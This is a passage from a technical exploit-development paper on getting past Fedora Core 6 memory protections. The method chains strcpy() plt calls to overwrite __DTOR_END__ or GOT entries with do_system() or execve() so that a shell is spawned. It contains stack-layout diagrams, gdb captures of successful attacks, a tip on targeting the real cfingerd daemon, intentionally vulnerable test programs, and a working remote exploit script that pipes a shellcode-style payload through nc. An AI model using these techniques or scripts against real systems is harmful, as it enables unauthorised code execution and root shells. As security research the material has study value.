| strcpy plt | eplg | func_arg1 | func_arg2 | strcpy plt | eplg | func_arg1 | func_arg2 | ... |
+------------+------+-----------+-----------+------------+------+-----------+-----------+-----+
                  ^                                        ^
                  |                                        |
                  +----------------------------------------+
                   __do_global_ctors_aux()'s epilog (12byte)

(3) After the chain of copy calls, make the last popped %eip the address of
    __do_global_dtors_aux(). When __do_global_dtors_aux() runs, the
    do_system() address copied to the __DTOR_END__ section is called by the
    "call *%edx" instruction and finally spawns a shell.
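
The process depends on knowing which byte goes to which offset and where such
a byte already exists in memory. A minimal sketch follows; split_le() and
find_byte() are hypothetical helpers, and the image array stands in for
whatever fixed-address bytes of the program are searched.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Split a 32-bit value into the four bytes that would be stored at
 * dest+0 .. dest+3 on little-endian x86. */
static void split_le(uint32_t value, uint8_t out[4])
{
    assert(out != NULL);
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(value >> (8 * i));
}

/* Offset of the first occurrence of `wanted` in a memory image, or -1 if
 * the byte does not occur. */
static long find_byte(const uint8_t *image, size_t len, uint8_t wanted)
{
    assert(image != NULL);
    for (size_t i = 0; i < len; i++)
        if (image[i] == wanted)
            return (long)i;
    return -1;
}
```

For a do_system() address of 0x001457d0, split_le() gives d0 57 14 00, the
bytes destined for __DTOR_END__+0 through __DTOR_END__+3. find_byte() then
reports where each of those bytes can be found in the searched image.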

More details are below:


Fedora Core 6, glibc 2.5, gcc 4.1.1-30:

Making attack code:

We call strcpy() (the copy function) several times by using the 12-byte %esp
move technique. Finding each byte of the do_system() address and of the "sh"
string in the heap is tedious, but not a big problem.

^
| Stack grows this way
...
+--------------------------------+
|             buffer             |: overflowed local variables
+--------------------------------+
|          strcpy() plt          |: Get by ascii-armor by calling plt copy function
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+0          |
+--------------------------------+
|     (&do_system()>>0)&0xff     |: 1byte of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+1          |
+--------------------------------+
|     (&do_system()>>8)&0xff     |: 1byte of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+2          |
+--------------------------------+
|    (&do_system()>>16)&0xff     |: 1byte of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+3          |
+--------------------------------+
|    (&do_system()>>24)&0xff     |: 1byte of null of do_system() address found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+4          |
+--------------------------------+
|              's'               |: 1byte of 'sh' string found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+5          |
+--------------------------------+
|              'h'               |: 1byte of 'sh' string found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+6          |
+--------------------------------+
|           null(0x00)           |: 1byte null found in program's text area
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|        __DTOR_END__+7          |
+--------------------------------+
|           null(0x00)           |: 1byte null found in program's text area
+--------------------------------+
|    __do_global_dtors_aux()     |: called by ret(pop %eip) code
+--------------------------------+
...
| Address grows this way
V

Buffer will be like this when the attack succeeds:

Result of debugging fedora core 6 glibc 2.5, gcc 4.1.1-30 exploit:

(gdb) br *do_system
Breakpoint 1 at 0xb517d0
(gdb) r
...
Breakpoint 1, 0x001457d0 in do_system () from /lib/libc.so.6
(gdb) print do_system
$1 = {<text variable, no debug info>} 0x1457d0 <do_system>
(gdb) x &__JCR_LIST__-1
0x80494c8 <__DTOR_END__>:       0x001457d0                ; do_system() function address
(gdb)
0x80494cc <__JCR_LIST__>:       0x00006873                ; 'sh' string
(gdb)
0x80494d0 <_DYNAMIC>:   0x00000001
(gdb)
0x80494d4 <_DYNAMIC+4>: 0x00000010
(gdb) x $eax
0x80494cc <__JCR_LIST__>:       0x00006873
(gdb)
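
The memory contents above can be reproduced harmlessly on a local array. The
sketch below replays the byte-by-byte strcpy() calls against a buffer that
stands in for __DTOR_END__; the helper names and the source strings are made
up. It also shows why each source only has to begin with the right byte:
anything copied after it is overwritten by the next call.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Copy srcs[i] to dest + i for i = 0 .. count-1, as the chain of strcpy()
 * calls does. `dest` must have room for the longest spill. */
static void replay_byte_copies(uint8_t *dest, const char *const *srcs,
                               size_t count)
{
    assert(dest != NULL && srcs != NULL);
    for (size_t i = 0; i < count; i++)
        strcpy((char *)dest + i, srcs[i]);
}

/* Read a little-endian 32-bit word, the way gdb displays it on x86. */
static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
```

Replaying eight sources that begin with d0, 57, 14, NUL, 's', 'h', NUL and
NUL leaves d0 57 14 00 73 68 00 00 in the buffer, which reads back as
0x001457d0 and 0x00006873, the two words shown by gdb.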

Next, we will look at the attack technique that uses system() and the exec
family functions. These functions need the stack to do their job.

Attack process:

(1) Find, inside the program, each byte of the address of the function that
    you wish to run. These bytes will be written to the __DTOR_END__ section.

(2) As mentioned before, copy the function address to the __DTOR_END__
    section by using the plt function and moving %esp by 12 bytes. At this
    point you can either build the desired command in the heap, just as in
    the do_system() attack, or attack using only a symlink.

(3) Make the last popped %eip the address right after the
    __do_global_dtors_aux() function prolog. This keeps the stack pointer
    unchanged, which makes it easy to set up the function arguments.



Fedora Core 6, glibc 2.5, gcc 4.1.1-30:

Making attack code:

This uses the same 12-byte %esp move technique introduced earlier. strcpy()
is called several times. Each call copies one byte of the 'sh' string or of
the execve() address, found in the heap, to its destination.


^
| Stack grows this way
...
+--------------------------------+
|             buffer             |: Will be overflowed local variable
+--------------------------------+
|          strcpy() plt          |: Get by ascii-armor by using plt call.
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|         __DTOR_END__+0         |: dest
+--------------------------------+
|       (&execve()>>0)&0xff      |: src - 1byte of execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|         __DTOR_END__+1         |
+--------------------------------+
|       (&execve()>>8)&0xff      |: 1byte of execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|         __DTOR_END__+2         |
+--------------------------------+
|      (&execve()>>16)&0xff      |: 1byte of execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|         __DTOR_END__+3         |
+--------------------------------+
|      (&execve()>>24)&0xff      |: 1byte of null in execve() address found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|         __DTOR_END__+4         |
+--------------------------------+
|              's'               |: 1byte of 'sh' string found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|         __DTOR_END__+5         |
+--------------------------------+
|              'h'               |: 1byte of 'sh' string found from text area of the program
+--------------------------------+
|          strcpy() plt          |
+--------------------------------+
| __do_global_ctors_aux() epilog |
+--------------------------------+
|         __DTOR_END__+6         |
+--------------------------------+
|            null(0x00)          |: 1byte of null found from text area of the program
+--------------------------------+
|   __do_global_dtors_aux()+6    |: Address right after __do_global_dtors_aux() prolog
+--------------------------------+
|     address of 'sh' string     |: the first argument of execve()
+--------------------------------+
| any null value address on heap |: the second argument of execve()
+--------------------------------+
| any null value address on heap |: the third argument of execve()
+--------------------------------+
...
| Address grows this way
V

After the attack, the buffer looks like this:

Debug report of fedora core 6 glibc 2.5, gcc 4.1.1-30 exploit:

(gdb) r
Starting program: /tmp/local_ex_test
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x0019dbff in ?? ()
(gdb) x 0x08049488
0x8049488:      0x0019dbff                ; Address of execve() overwritten on __DTOR_END__ section
(gdb)
0x804948c:      0x00006873                ; 'sh' string
(gdb)
0x8049490:      0x00000000
(gdb) x $eax
0x804948c:      0x00006873
(gdb) x $esp
0xbfe2810c:     0x0804831b
(gdb)
0xbfe28110:     0x0804948c                ; the first argument of execve()
(gdb)
0xbfe28114:     0x08048008                ; the second argument of execve()
(gdb)
0xbfe28118:     0x08048008                ; the third argument of execve()
(gdb) x 0x0804948c
0x804948c:      0x00006873
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb)

Because we control both the stack pointer and the values on the stack, we
can build the arguments of execve() as we like. In addition, the "/bin/sh"
string in the library is located at an address under 16 MB, so a function
that takes few arguments, such as system(), can be used for a remote attack.
With the exec family, we can copy the 'sh' string onto the heap and symlink
it to a program that executes a shell, just as in the do_system() attack.

To make the exploit more adaptable to other systems, we may need to find
the bytes of the do_system() address and of the "sh" string in the ELF
header or at the start of the program's text area. Binaries compiled in a
similar environment will most likely have the same static layout and the
same addresses.

Here is a small tip. If you want to attack a real application, look for
the functions below. The names of these functions are listed on the heap,
and since each name ends in "sh", you can take the 'sh' string from there.


bdflush()
tcflush()
fflush()

[root@localhost src]# objdump -d cfingerd | grep '<fflush@plt>:'
08048ff0 <fflush@plt>:
[root@localhost src]# gdb in.cfingerd -q
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) x/s 0x08048705
0x8048705:       "__gmon_start__"
(gdb)
0x8048714:       "libc.so.6"
(gdb)
0x804871e:       "_IO_stdin_used"
(gdb)
0x804872d:       "socket"
(gdb)
0x8048734:       "fflush"
(gdb) x/s 0x8048738
0x8048738:       "sh"
(gdb)

Thus we can now write highly adaptable exploit code for a specific
application. Refer to the example code for more details.


----[ 5.4 - Overflow exploit overwriting GLOBAL OFFSET TABLE

The technique in this chapter is similar to the function execution technique
of chapter 5.3. When you cannot use the __do_global_dtors_aux() function, or
you do not know the addresses of the p section and __DTOR_END__, you can try
this technique.

I will not go into the details of the plt and got. Our job is to find useful
material inside the program and analyze it.
Generally, a plt entry looks like this:


fedora core 6 glibc 2.5, gcc 4.1.1-30:

        <func@plt>:
        jmp *_GLOBAL_OFFSET_TABLE_
        push $n
        jmp _dl_runtime_resolve

If we call func's plt after overwriting its _GLOBAL_OFFSET_TABLE_ entry with
the address of execve(), the plt entry effectively becomes:


        jmp execve();

In the attack of chapter 5.3, __do_global_dtors_aux() reaches execve() with
a call instruction, so %eip is pushed onto the stack as a return address.
When you attack through the GOT, by contrast, the plt reaches the function
with jmp, which does not push a return address. We therefore need to insert
4 bytes of dummy data in place of the saved %eip. It is a small difference,
but a critical one when laying out the arguments of the target function.


fedora core 6 glibc 2.5, gcc 4.1.1-30:

Making attack code:

Overwrite the GOT entry of __libc_start_main() with the address of the
execve() function through multiple plt calls. This is the same technique of
moving %esp by 12 bytes used in chapter 5.3. When the function's plt is then
called, the desired function runs and takes its arguments relative to the
current stack pointer.

^
| Stack grows this way
...
+--------------------------------------------+
|                strcpy() plt                |
+--------------------------------------------+
|       __do_global_ctors_aux() epilog       |
+--------------------------------------------+
| __libc_start_main() _GLOBAL_OFFSET_TABLE+0 |
+--------------------------------------------+
|             (&execve()>>0)&0xff            |
+--------------------------------------------+
|                strcpy() plt                |
+--------------------------------------------+
|            ... abbreviation ...            |
+--------------------------------------------+
|          __libc_start_main() plt           |: __libc_start_main() function's plt
+--------------------------------------------+
|                dummy 4byte                 |: required because execve() is reached by jmp, not by call
+--------------------------------------------+
|             'sh' string address            |: the first argument of execve()
+--------------------------------------------+
|         Null value address on heap         |: the second argument of execve()
+--------------------------------------------+
|         Null value address on heap         |: the third argument of execve().
+--------------------------------------------+
...
| Address grows this way
V

After the attack, the buffer looks like this:

Debug report for fedora core 6 glibc 2.5, gcc 4.1.1-30 exploit:

(gdb) r
Starting program: /tmp/local_ex_test
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x0019dbff in ?? ()
(gdb) x 0x08049570
0x8049570:      0x0019dbff                ; execve() function address overwritten on __libc_start_main GOT section
(gdb)
0x8049574:      0x00006873                ; 'sh' string
(gdb) x $esp
0xbfa3b520:     0x82828282                ; dummy 4byte
(gdb)
0xbfa3b524:     0x08049574                ; the first argument of execve()
(gdb)
0xbfa3b528:     0x08048008                ; the second argument of execve()
(gdb)
0xbfa3b52c:     0x08048008                ; the third argument of execve()
(gdb) x 0x08049574
0x8049574:      0x00006873
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb) x 0x08048008
0x8048008:      0x00000000
(gdb)


Compared with the attack technique of chapter 5.3, there are three
differences. First, it overwrites a GOT entry with the address of execve().
Second, it uses the plt to jump to that function. Third, it needs 4 bytes of
dummy data. You can find more in the example code.


----[ 5.5 - Example code

  I have described several changes introduced since F/C 5 and the exploit
techniques that deal with them. The appendix in chapter 6.9 demonstrates the
contents of chapter 5.1. The %ecx off-by-one exploit is the 0x82-x_strcpy.c
code provided in 6.9. I have attached the debugging output with it, so
please take a look at that too. The remote exploit code for chapter 5.3 is
0x82-remote_x_strcpy.c in 6.10. The 0x82-local-x_execve.c code in chapter
6.11 is the execve exploit. Finally, 0x82-local_got_execve.c in chapter 6.12
is the GOT exploit of chapter 5.4.



--[ 6 - Appendix

  From this chapter on, I show example code to demonstrate what I have
described since the start of this paper. I sometimes add notes to the code.
Some of these notes apply to real exploits, and others are just for
proof of concept.


----[ 6.1 - ret(pop %eip) remote stack overflow exploit

  This is the code from the POC 2006 conference. I admit that I did not put
enough time and effort into this script, and it is very awkward to debug.
It is meant for testing on F/C 3 only.

-- rvuln.c --
#include <stdio.h>

int main(int argc,char *argv[])
{
        char buf[8];
        gets(buf);
}
--

I registered the rvuln program as the fido service daemon through xinetd.
Below is a simple exploit script.

-- 0x82-remote_ret.sh --
#!/bin/sh
#
# Remote ret(pop eip) exploit
# by Xpl017Elz
#
# 0x08048394 <main+44>:   ret
#

(printf "aaaabbbbx;sh\x94\x83\x04\x08\x94\x83\x04\x08\x94\x83\x04\x08\x94\x83\x04\x08\x94\x83\x04\
\x08\xc0\xc7\xee\xf6";cat) | nc localhost fido

#
# EOS
#
--

You can guess the address of a ret instruction remotely, or find it like this:

--
[x82@localhost tmp]$ objdump -d rvuln | grep ret
804828e:       c3                      ret
8048304:       c3                      ret
8048339:       c3                      ret
8048365:       c3                      ret
8048394:       c3                      ret
80483e9:       c3                      ret
804842d:       c3                      ret
8048453:       c3                      ret
804846d:       c3                      ret
[x82@localhost tmp]$
--


----[ 6.2 - ret(pop %eip) + symlink local stack overflow exploit

  This exploit code was tested on F/C 4 and also works against F/C 5 and 6.
To test the code, the target program has to be setuid (it does not matter
whether it is setuid root or not).

-- vuln.c --
#include <string.h>     /* declares strcpy() */

int main(int argc,char *argv[])
{
        char buf[256];
        strcpy(buf,argv[1]);    /* intentionally unchecked copy: the test target */

        return 0;
}
--

Attack code is below:

-- 0x82-break_FC4.c --
/*
**
** Code name: 0x82-break_FC4.c
** Description: Fedora Core Linux 4 based stack overflow ex